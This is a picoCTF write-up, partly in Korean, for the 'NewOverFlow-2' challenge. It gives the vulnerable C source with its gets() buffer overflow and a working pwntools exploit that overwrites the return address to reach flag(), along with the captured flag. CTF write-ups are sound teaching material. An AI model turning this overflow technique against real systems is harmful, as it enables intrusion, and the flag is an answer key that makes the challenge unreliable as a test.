picoCTF - NewOverFlow-2

 

 

 

 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

bool win1 = false;
bool win2 = false;

void win_fn1(unsigned int arg_check) {
  if (arg_check == 0xDEADBEEF) {
    win1 = true;
  }
}

void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) {
  if (win1 && \
      arg_check1 == 0xBAADCAFE && \
      arg_check2 == 0xCAFEBABE && \
      arg_check3 == 0xABADBABE) {
    win2 = true;
  }
}

void win_fn() {
  char flag[48];
  FILE *file;
  file = fopen("flag.txt", "r");
  if (file == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(flag, sizeof(flag), file);
  if (win1 && win2) {
    printf("%s", flag);
    return;
  }
  else {
    printf("Nope, not quite...\n");
  }


  

}

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Can you match these numbers?");
  vuln();
  return 0;
}

 

 

 

 

vuln()함수에서 gets()함수로 v1에 입력을 받고 v1은 rbp-40에 위치한다.

vuln()함수에서 main()함수를 호출하고 flag()함수를 호출하면 된다.

 

 

 

 

from pwn import *

s = ssh(host = '2019shell1.picoctf.com', user = '', password = '')
s.set_working_directory('/problems/newoverflow-2_0_b7d9b3bbdbb843a28a13ff1aa57410df')
p = s.process('./vuln')
e = ELF('/home/ii4gsp/picoCTF/NewOverFlow2')

main = e.symbols['main']
flag = e.symbols['flag']

payload = ''
payload += '\x90' * 72
payload += p64(main)
payload += p64(flag)

p.sendline(payload)

p.interactive()

 

 

 

 

Flag: picoCTF{r0p_1t_d0nT_st0p_1t_b1c10cce}